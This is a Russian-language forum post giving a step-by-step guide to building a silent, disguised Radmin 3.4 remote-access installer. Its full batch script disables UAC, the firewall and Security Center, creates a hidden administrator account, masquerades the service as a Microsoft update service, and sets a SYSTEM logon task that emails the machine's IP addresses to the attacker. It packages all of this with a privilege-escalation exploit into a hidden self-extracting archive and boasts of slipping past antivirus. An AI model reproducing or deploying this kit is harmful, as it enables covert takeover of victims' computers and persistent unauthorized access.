1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Создание и тихая установка сервера Radmin 3.4 v2

Тема в разделе "Чужие", создана пользователем webster, 10 июн 2012.

  1. TopicStarter Overlay
    webster

    webster Гость

    Отличия от предыдущей сборки:
    • переработан msi пакет, теперь он не мусорит в пуске и в списке установленных программ
    • добавлена функция отправки внешнего и внутреннего IP адреса на email (спасибо за идею SubW00fer)
    • сборка работает на windows XP/2003/Vista/7
    • для windows Vista/7 добавлена возможность установки сервера с правами пользователя (на основе сплойта Windows Task Scheduler Privilege Escalation)
    • добавлено отключение UAC в процессе установке





    Код:
    Создание инсталлятора







    Radmin Server 3.4 XNT Edition


    Что понадобится:
    • пакет утилит Radmin Deployment tool (Please login or register to view links)
    • msi пакет сервера Radmin 3.4 (не требует активации, скрывает иконку в трее, не пишется в пуск и установленные программы) (Please login or register to view links)
    • программа Bat to Exe Converter (Please login or register to view links)
    • архиватор WinRar (скачать)
    • архив для отправки email (Please login or register to view links)
    • сплойт Windows Task Scheduler Privilege Escalation (Please login or register to view links)
    Всё барахло одним пакетом (Please login or register to view links)

    Устанавливаем Radmin Deployment tool, после установки запускаем Radmin MSI Configurator, указываем ему на скачанный msi пакет сервера Radmin 3.4, задаём настройки, добавляем пользователя и сохраняем. Я задал имя пользователя adm, пароль 123456 и сохранил пакет под именем msupdate.msi

    Please login or register to view links

    Откладываем этот пакет в сторонку и начинаем настройку почтового клиента. Распаковываем архив ip.rar, открываем файл ip.bat, смотрим на 8 строку:




    Код:
    blat.exe -install -server smtp.yandex.ru -port 25 -f iprdm@yandex.ru -u iprdm -pw 123456		  
    smtp.yandex.ru - smtp адрес вашего почтового сервера, указываем свой
    -port 25 - smtp порт, скорее всего, у вас такой же
    iprdm@yandex.ru - ваш почтовый ящик, указываем свой
    -u iprdm - логин почтового ящика, пишем свой
    -pw 123456 - пароль почтового ящика, соответственно, указываем свой
    
    
    Далее, 9 и 10 строки:



    Код:
    blat.exe -to iprdm@yandex.ru -subject "Local IP" -attachi "localip.txt" -body "Locals IP"
    blat.exe -to iprdm@yandex.ru -subject "Real IP" -attachi "realip.txt" -body "Real IP"			
    -to iprdm@yandex.ru - email адрес, на который будут отправляться письма[/color][/font]
    -subject "Local IP", -subject "Real IP" - заголовки письма
    
    
    После того как вы изменили указанные данные на свои, сохраняем файл, закрываем.
    Хочу обратить внимание - если вы не знаете какой адрес и порт вашего smtp сервера, зайдите на сайт и поищите в разделе помощи и часто задаваемых вопросов. Наверняка там найдётся эта информация. Если и здесь вас постигла неудача, зарегистрируйте ящик на yandex.ru и заполните поля по аналогии с вышеуказанным примером.

    Далее, запускаем программу Bat to Exe Converter, выбираем файл ip.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory. Далее, переходим на вкладку Include, жмем Add и добавляем файлы blat.exe, blat.dll, blat.lib, realip.exe, которые есть у вас в папке ip. Затем жмём Compile и получаем файл ip.exe

    Please login or register to view links

    Откладываем готовый ip.exe к msupdate.msi. Теперь создадим сценарий, который будет устанавливать нашу сборку. Открываем блокнот и вставляем туда этот код:



    Код:
    	  @echo off
    
    if exist c:\users\nul (goto win7) else goto winxp
    
    :win7
    ping -n 3 127.0.0.1
    start %temp%\poc.exe
    ping -n 3 127.0.0.1
    goto install
    
    :winxp
    net stop Alerter
    sc config Alerter start= disabled
    net stop wscsvc
    sc config wscsvc start= disabled
    net stop SharedAccess
    sc config SharedAccess start= disabled
    sc config TlntSvr start= auto
    net start TlntSvr
    
    :install
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v HelpAssistant /t REG_DWORD /d 0 /f
    
    net user HelpAssistant admin /add
    net localgroup Ђ¤¬Ё*Ёбва*в®ал HelpAssistant /add
    net user HelpAssistant /active:yes /comment:"“зҐв**п §*ЇЁбм ¤«п ЇаҐ¤®бв*ў«Ґ*Ёп Ї®¬®йЁ" /passwordchg:yes
    net user HelpAssistant admin
    
    %temp%\msupdate.msi /qn /norestart
    
    start %temp%\ip.exe
    
    ping -n 5 127.0.0.1
    
    attrib +S +H %windir%\system32\rserver30
    
    schtasks /create /tn security /sc onlogon /ru "NT AUTHORITY\SYSTEM" /tr %temp%\ip.exe
    
    net stop rserver3
    reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "DisplayName" /d "Microsoft Update Provide" /f
    reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "Description" /d "Update your Windows operation system and check corruption files" /f
    net start rserver3
    
    @rem © special 4 xaker.name by Iindigo  


    Тоже самое, но с комментариями:

    Код:
    @rem отключаем вывод консольного окна
    @echo off
    
    @rem проверяем какая система установлена на компьютере
    if exist c:\users\nul (goto win7) else goto winxp
    
    @rem если windows vista/7, то запускаем сплойт и перемещаемся к маркеру install
    :win7
    ping -n 3 127.0.0.1
    start %temp%\poc.exe
    ping -n 3 127.0.0.1
    goto install
    
    @rem если windows xp, то останавливаем и отключаем службы "Оповещатель", "Центр обеспечения безопасности" и "Брандмауэр Windows", включаем и стартуем службу "Telnet"
    :winxp
    net stop Alerter
    sc config Alerter start= disabled
    net stop wscsvc
    sc config wscsvc start= disabled
    net stop SharedAccess
    sc config SharedAccess start= disabled
    sc config TlntSvr start= auto
    net start TlntSvr
    
    @rem отключаем UAC (будет выключен после перезагрузки) и добавляем системную учётку HelpAssistant
    :install
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Pol icies\System /v EnableLUA /t REG_DWORD /d 0 /f
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v HelpAssistant /t REG_DWORD /d 0 /f
    
    @rem непосредственно добавляем пользователя HelpAssistant, добавляем в группу Администраторы, даём пароль admin
    net user HelpAssistant admin /add
    net localgroup Ђ¤¬Ё*Ёбва*в®ал HelpAssistant /add
    net user HelpAssistant /active:yes /comment:"“зҐв**п §*ЇЁбм ¤«п ЇаҐ¤®бв*ў«Ґ*Ёп Ї®¬®йЁ" /passwordchg:yes
    net user HelpAssistant admin
    
    @rem запускаем скрытую установку нашего msi пакета
    %temp%\msupdate.msi /qn /norestart
    
    @rem запускаем скрипт отправки IP на наш почтовый адрес
    start %temp%\ip.exe
    
    @rem немного ждём, пока стартует служба и гарантированно завершится установка msi пакета
    ping -n 5 127.0.0.1
    
    @rem устанавливаем аттрибуты "системный" и "скрытый" для папки с установленным сервером
    attrib +S +H %windir%\system32\rserver30
    
    @rem добавляем задачу "при входе в винду отправлять IP на email"
    schtasks /create /tn security /sc onlogon /ru "NT AUTHORITY\SYSTEM" /tr %temp%\ip.exe
    
    @rem останавливаем службу радмина, переименовываем и опять стартуем (окончательное переименование произойдёт после перезагрузки)
    net stop rserver3
    reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "DisplayName" /d "Microsoft Update Provide" /f
    reg add "HKLM\System\CurrentControlSet\Services\RServe r3" /v "Description" /d "Update your Windows operation system and check corruption files" /f
    net start rserver3
    
    @rem © special 4 xaker.name by Iindigo   


    Сохрянем файл как inst.cmd. Открываем программу Bat to Exe Converter, выбираем файл inst.cmd, выставляем переключатель Visibility в Invisible Application, переключатель Working Directory в Temporary Directory и жмём Compile. Получаем inst.exe.

    Кладём этот файл в кучу к msupdate.msi, ip.exe и туда же добавляем наш сплойт - poc.exe.
    В итоге, у нас получилось 4 файла, ещё раз перечислю их:
    • msupdate.msi - специальный пакет radmin server 3.4
    • ip.exe - программа которая возьмёт ip компьютера и отправит нам их на мыло
    • inst.exe - основной инсталлятор
    • poc.exe - сплойт Windows Task Scheduler Privilege Escalation
    Please login or register to view links

    Все 4 файла объединяем в один самораспаковывающийся архив. Ставим архиватор WinRar. Затем, выделяем файлы и создаем архив. Даём архиву название, к примеру msupdate. В настройках архива ставим галочки напротив "Создать "SFX-архив" и "Протестировать файлы после упаковки". Уровень сжатия ставим максимальный. Далее переходим на вкладку "Дополнительно" и открываем "Параметры SFX".
    Вкладка "Общие":
    Путь для распаковки - вводим %temp%
    Выполнить после распаковки - вводим %temp%\inst.exe

    Вкладка "Режимы":
    Режим вывода информации - ставим в "Скрыть всё"

    Вкладка "Обновление":
    Режим перезаписи - ставим в "Перезаписывать все файлы без запроса"
    Жмём "Ок" и ещё раз "Ок" для создания архива.
    Инсталлятор готов.

    Please login or register to view links








    Код:
    Установка пакета


    Сборка тестировалась на системах:
    • Windows 7 с правами пользователя (Please login or register to view links)
    • Windows 2003 (Please login or register to view links)
    • Windows XP Please login or register to view links)
    Самое показательное видео, демонстрирующее все возможности сборки, в ролике "Windows 7 с правами пользователя"








    Код:
    Достоинства и недостатки


    Минусы:
    в общем-то все что были - все остались

    - не удалось скрыть процесс сервера
    - во время установки, пару раз моргает экран
    - некоторые антивирусы могут среагировать на сплойт poc.exe
    - при установке на Windows Vista/7, могут быть случаи зависания/bsod'а из-за специфики сплойта

    Плюсы:

    + сервер не виден в трее, пуске, установленных программах, службах, скрыта папка в \system32
    + тихая установка в 1 клик
    + сервер не требует активации
    + ставится на Windows XP/2003/Vista/7 x32
    + отправляет письмо с IP адресом машины на email
    + устанавливается с правами пользователя на Windows Vista/7
    + отключает UAC на Vista/7








    Код:
    Заключение

    Переименовать процесс, без глубокого ревёрсинга, не представляется возможным. По крайней мере мне, спустя несколько дней пыхтения, этого сделать не удалось. Служба сервера просто не стартует.

    Сплойт, с помощью которого ставится сборка на Windows Vista/7 пока ещё актуален и палится далеко не всем. Поэтому существует вероятность установки сборки при живом антивирусе. Далее, microsoft понавыпускает патчи, антивирусы добавят сплойт в базы и тогда, на защищённую систему, сборку будет уже не поставить.

    Если есть мысли как улучшить данный способ - архив и все исходники в вашем распоряжении. Буду только рад.

    Готового пакета не будет, т.к.:
    • Необходима персональная настройка почтового клиента для отдельного юзера;
    • Пора включать мозг и распрямлять руки.
    © Please login or register to view links
     
    • Like Like x 1
    Метки:

Поделиться этой страницей

Загрузка...